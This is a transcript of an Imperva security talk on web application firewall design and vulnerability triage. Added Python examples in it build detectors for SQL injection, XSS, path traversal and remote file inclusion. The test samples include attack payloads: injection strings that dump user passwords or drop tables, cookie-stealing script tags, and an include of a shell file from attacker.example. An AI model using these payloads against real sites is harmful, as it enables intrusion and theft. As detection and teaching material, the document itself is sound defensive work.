d3tlv17- keeping it safe

Keeping it Safe. Ben Herzberg, Security Research Group Manager, Imperva (@KernelXSS, @imperva)

Upload: imperva-incapsula

Post on 21-Jan-2018


TRANSCRIPT

Keeping it Safe

Ben Herzberg

Security Research Group Manager, Imperva

@KernelXSS @imperva


> ben.childNodes.length
< 2
> ben.history
< ["PT", "Dev"]
> ben.employer
< "Imperva"
> ben.positionX
< "Research Group Manager"
> ben.social
< {"TWT": "@KernelXSS", "LNK": "Ben Herzberg"}

© 2017 Imperva, Inc. All rights reserved.

Web Application Security


Our “Ground Rules”

As little config as possible

Focus on low FPs

Use our CDN to cover more AVs


Being app agnostic…


Being app agnostic…

Example #1: SQL Injection

Queries sent over an application

Pseudo-SQL

“Close Calls”
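To make the "close calls" concrete: an app-agnostic WAF sees only the bytes in a parameter, so it has to tell injection apart from English that happens to use SQL vocabulary, and from whole statements that some applications (a database admin console, for instance) legitimately send over HTTP. The following is an added example, not Imperva's code and not from the talk: a deliberately naive keyword rule next to a rule that looks for injection structure (breaking out of a quoted literal, UNION SELECT, stacked queries, comment terminators) after undoing URL encoding and inline comments. The keyword set, patterns and sample values are all constructed for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Keyword list for the deliberately naive rule. Illustrative only; not a real WAF signature set.
SQL_KEYWORDS = {
    "select", "union", "insert", "update", "delete", "drop", "from",
    "where", "or", "and", "order", "table", "having", "group",
}


def normalize(value: str) -> str:
    """Undo the encodings an attacker relies on before the value reaches the SQL engine."""
    text = value
    for _ in range(2):                                  # double URL-encoding: %2527 -> %27 -> '
        text = unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # inline comments used as separators: UNION/**/SELECT
    return re.sub(r"\s+", " ", text).strip()            # tabs/newlines used instead of spaces


def naive_keyword_rule(value: str) -> bool:
    """Flag a value carrying two or more SQL keywords. Cheap, and wrong on ordinary English."""
    words = set(re.findall(r"[a-z]+", normalize(value).lower()))
    return len(words & SQL_KEYWORDS) >= 2


# Injection *structure*: breaking out of a literal or changing the statement, not just SQL vocabulary.
INJECTION_STRUCTURE = [
    re.compile(r"""['"]\s*(?:or|and)\s+[\w'"]+\s*(?:=|like)\s*[\w'"]+""", re.I),  # ' OR '1'='1
    re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I),                 # UNION SELECT ...
    re.compile(r";\s*(?:drop|insert|update|delete|select|exec)\b", re.I),           # stacked query
    re.compile(r"""['"]\s*(?:--|/\*)"""),                                            # admin'--  (comment out the rest)
    re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I),                        # time-based blind probes
]


def structural_rule(value: str) -> bool:
    """Flag only values whose syntax would alter a query they were concatenated into."""
    text = normalize(value)
    return any(p.search(text) for p in INJECTION_STRUCTURE)


# Constructed sample parameter values, not captured traffic.
INJECTIONS = [
    "' OR '1'='1",
    "1 UNION SELECT username, password FROM users",
    "admin'--",
    "1; DROP TABLE users",
    "1%2527%2520OR%25201%253D1--",        # double URL-encoded  1' OR 1=1--
    "1'/**/OR/**/'a'='a",                  # comments instead of spaces
]

CLOSE_CALLS = [
    "Select your seat and order from the menu",      # English that happens to be SQL vocabulary
    "Drop by the union hall, then select a table",
    "Where are you and who is with you?",
    "O'Brien",                                        # a quote in a name
]

# "Queries sent over an application": a DB admin console legitimately posts whole statements.
# The structural rule passes it; whether that is right depends on what *this* parameter is for,
# which is exactly the per-application knowledge an app-agnostic, low-config WAF does not have.
QUERY_OVER_APP = "SELECT name FROM users WHERE id = 5 ORDER BY name"


def evaluate(samples):
    """Return {value: (naive_verdict, structural_verdict)} for each sample."""
    return {v: (naive_keyword_rule(v), structural_rule(v)) for v in samples}


if __name__ == "__main__":
    groups = (("injection", INJECTIONS), ("close call", CLOSE_CALLS), ("app query", [QUERY_OVER_APP]))
    for group, samples in groups:
        for value, (naive, structural) in evaluate(samples).items():
            print(f"{group:10}  naive={naive!s:5}  structural={structural!s:5}  {value}")
```

Running it, the keyword rule flags every close call while the structural rule flags only the injections. The admin-console statement passes the structural rule, which is the right verdict for an admin console and the wrong one if that parameter was supposed to be a number; resolving that needs per-parameter knowledge, which is in tension with "as little config as possible".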


Being app agnostic…

Example #2: Cross-Site Scripting

HTML sent as part of request

Javascript sent as part of request

Javascript being… Javascript…
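The three bullets are three different inspection problems: inert HTML in a request is normal for any site with a rich-text editor, JavaScript source in a request is normal for any site where people paste code, and the attack is markup that would make a browser execute script. The following is an added example, not from the talk and not Imperva's code: it decodes the layers a browser decodes (URL encoding, HTML entities, the tab/newline/NUL characters browsers ignore inside a URL scheme, letter case) and then matches only script-bearing constructs, leaving inert tags and free-standing JavaScript alone. The patterns and sample values are constructed for the illustration.

```python
import html
import re
from urllib.parse import unquote


def normalize_markup(value: str) -> str:
    """Apply the decodings a browser performs before the bytes are interpreted as HTML."""
    text = value
    for _ in range(2):                            # double URL-encoding: %253C -> %3C -> <
        text = unquote(text)
    text = html.unescape(text)                    # &#x3C; &lt; &#60; inside attribute values -> <
    text = re.sub(r"[\x00\t\n\r]", "", text)      # ignored by browsers inside a URL scheme: jav\tascript:
    return text.lower()                           # <ScRiPt> is still a script tag


# Constructs that make markup *execute*; inert tags such as <b> or <p> are deliberately absent.
SCRIPT_BEARING = [
    re.compile(r"</?script\b"),                           # <script>alert(1)</script>
    re.compile(r"<(?:iframe|object|embed|base)\b"),       # elements that load or redirect to script
    re.compile(r"<[a-z][^>]*[\s/]on[a-z]+\s*="),          # event handler attribute: onerror=, /onload=
    re.compile(r"<[^>]*(?:javascript|vbscript)\s*:"),     # script URI scheme inside a tag
]


def is_script_bearing(value: str) -> bool:
    """True when the decoded value contains markup that would execute script in a browser."""
    text = normalize_markup(value)
    return any(p.search(text) for p in SCRIPT_BEARING)


def classify(samples):
    """Return {value: verdict} for a list of parameter values."""
    return {v: is_script_bearing(v) for v in samples}


# Constructed samples, not captured traffic.
ATTACKS = [
    "<script>alert(1)</script>",
    "<ScRiPt>alert(1)</sCrIpT>",                             # case games
    "%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E",    # URL-encoded once
    "%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E",  # URL-encoded twice
    "<img src=x onerror=alert(1)>",
    "<svg/onload=alert(1)>",                                 # no whitespace at all
    '<a href="jav&#x09;ascript:alert(1)">x</a>',             # entity-encoded tab splits the scheme
    '<IfRaMe SrC="javascript:alert(1)">',
]

CLOSE_CALLS = [
    "<p>Hello <b>world</b> &amp; friends</p>",                  # HTML sent as part of a request: rich-text editor
    '<a href="https://example.com/docs?page=2">docs</a>',       # a link, not a script URI
    "function onReady(e) { return e.count < 1; }",              # JavaScript sent as part of a request: a code paste
    "Tom & Jerry <3 cats; set onload=handler in the config",    # handler name in prose, no tag around it
]


if __name__ == "__main__":
    for label, samples in (("attack", ATTACKS), ("close call", CLOSE_CALLS)):
        for value, verdict in classify(samples).items():
            print(f"{label:10}  script_bearing={verdict!s:5}  {value}")
```

The decoding step is where the false-positive budget is spent: each extra layer of decoding (here two rounds of URL decoding and one of entity decoding) catches another evasion and also turns more harmless text into something that looks like a tag.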


Being app agnostic…

Example #4: MISC…

GET + Content-Type + Content-Length

/%00/demo/welcome

src=../../../../windows/bannerWindow/a.jpg

PHP in RFI
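The items on this slide are request-level anomalies rather than payload signatures: a GET carrying Content-Type and Content-Length has a body the method promises not to have (and a body inspector keyed on POST would skip it), /%00/demo/welcome hides a NUL that only appears after decoding, the src= value climbs four directories above wherever it is anchored, and "PHP in RFI" is an include parameter pointing at a remote URL or a PHP stream wrapper. The following is an added example, not Imperva's code and not from the talk: it parses constructed raw requests and reports each of these. The host name, parameter names and sample bodies are invented for the illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit


def build_request(method: str, target: str, headers=(), body: str = "") -> str:
    """Assemble a raw HTTP/1.1 request string for the constructed samples below."""
    lines = [f"{method} {target} HTTP/1.1", "Host: shop.example"]
    lines += [f"{name}: {value}" for name, value in headers]
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return "\r\n".join(lines) + "\r\n\r\n" + body


def parse_request(raw: str):
    """Split a raw request into (method, target, headers, body); header names are lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def traversal_depth(value: str) -> int:
    """How many directory levels a path climbs above its starting point once normalized.

    images/../banners/a.jpg -> 0 (never leaves its base); ../../../../x/a.jpg -> 4.
    Whether 4 is an attack depends on where the parameter is anchored, which the WAF does not know.
    """
    path = unquote(unquote(value)).replace("\\", "/")   # %2e%2e%2f, %252e..., and backslashes
    depth = lowest = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        lowest = min(lowest, depth)
    return -lowest


# Schemes that turn a file-include parameter into remote or stream input (PHP wrappers included).
INCLUDE_SCHEME = re.compile(r"^\s*(?:https?|ftp|php|data|expect|file)\s*:", re.I)


def looks_like_remote_include(value: str) -> bool:
    return bool(INCLUDE_SCHEME.match(unquote(unquote(value))))


def check_request(raw: str) -> list:
    """Return a list of anomaly descriptions for one raw request (empty list = nothing noticed)."""
    method, target, headers, body = parse_request(raw)
    findings = []

    # GET + Content-Type + Content-Length: a body where the method promises none.
    body_len = int(headers.get("content-length") or 0)
    if method == "GET" and (body_len > 0 or body):
        findings.append("body on GET")

    # /%00/demo/welcome: the NUL only appears after decoding; front end and back end may disagree on it.
    if "\x00" in unquote(unquote(urlsplit(target).path)):
        findings.append("NUL byte in path")

    # Inspect parameters from the query string and, regardless of method, from a form-encoded body.
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body, keep_blank_values=True)
    for name, value in params:
        depth = traversal_depth(value)
        if depth > 0:
            findings.append(f"{name}: climbs {depth} level(s) above its base")
        if looks_like_remote_include(value):
            findings.append(f"{name}: remote or stream include target")
    return findings


FORM = (("Content-Type", "application/x-www-form-urlencoded"),)

# Constructed sample requests, not captured traffic.
SAMPLE_REQUESTS = {
    "get_with_body": build_request("GET", "/search?q=shoes", FORM, "page=http://attacker.example/shell.txt"),
    "nul_in_path": build_request("GET", "/%00/demo/welcome"),
    "traversal": build_request("GET", "/view?src=../../../../windows/bannerWindow/a.jpg"),
    "php_wrapper": build_request("POST", "/include", FORM, "file=php://input"),
    "benign": build_request("GET", "/view?src=images/../banners/a.jpg&page=2"),
}


if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(f"{label:14} {check_request(raw) or 'no findings'}")
```

Note that the body of the GET is parsed the same way as a POST body, so the include parameter hidden there is still inspected; and that the traversal check reports a depth rather than a verdict, because four levels up is an attack or not depending on the directory the application resolves src= against.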


Platforms & Frameworks


So what do we do?


Automate all of the things


Find new stuff

TRAP

ASSESS

BLOCK

REPEAT

Find new stuff

Algorithmics

(ML)


Vulnerabilities Tracking


Why?

Create a clear process for Vulnerabilities Management

Give our customers an efficient & prioritised vulnerability response procedure

Unified process


New VR+EF: Scoping

CVSS > 9.0 + NO AUTH + WEB REMOTE = HPC

10+ TWEETS = HPC

CVSS > 7.0 + 4+ TWEETS = REGULAR+

HAS EXPLOIT OR CVSS > 8.0 = REGULAR

SEC INTEL. = HPC


Business Days (table): columns HPC, REGULAR+; rows OOS, OOTB, Followup, Mitigation Needed, Emergency Feed


Weekends (table): column HPC; rows OOS, OOTB, Followup, Mitigation Needed, Emergency Feed


Some of our projects…


TMI


Timeline (slide): Antivirus, Firewall, WAF, IPS; years marked 1987, 1992, 1999, NOW


Attack Analytics


Putting things in context…


IP Reputation


Automated Attacks



@KernelXSS, @imperva

Thank You!

Let's Talk!

linkedin.com/in/sysadmin

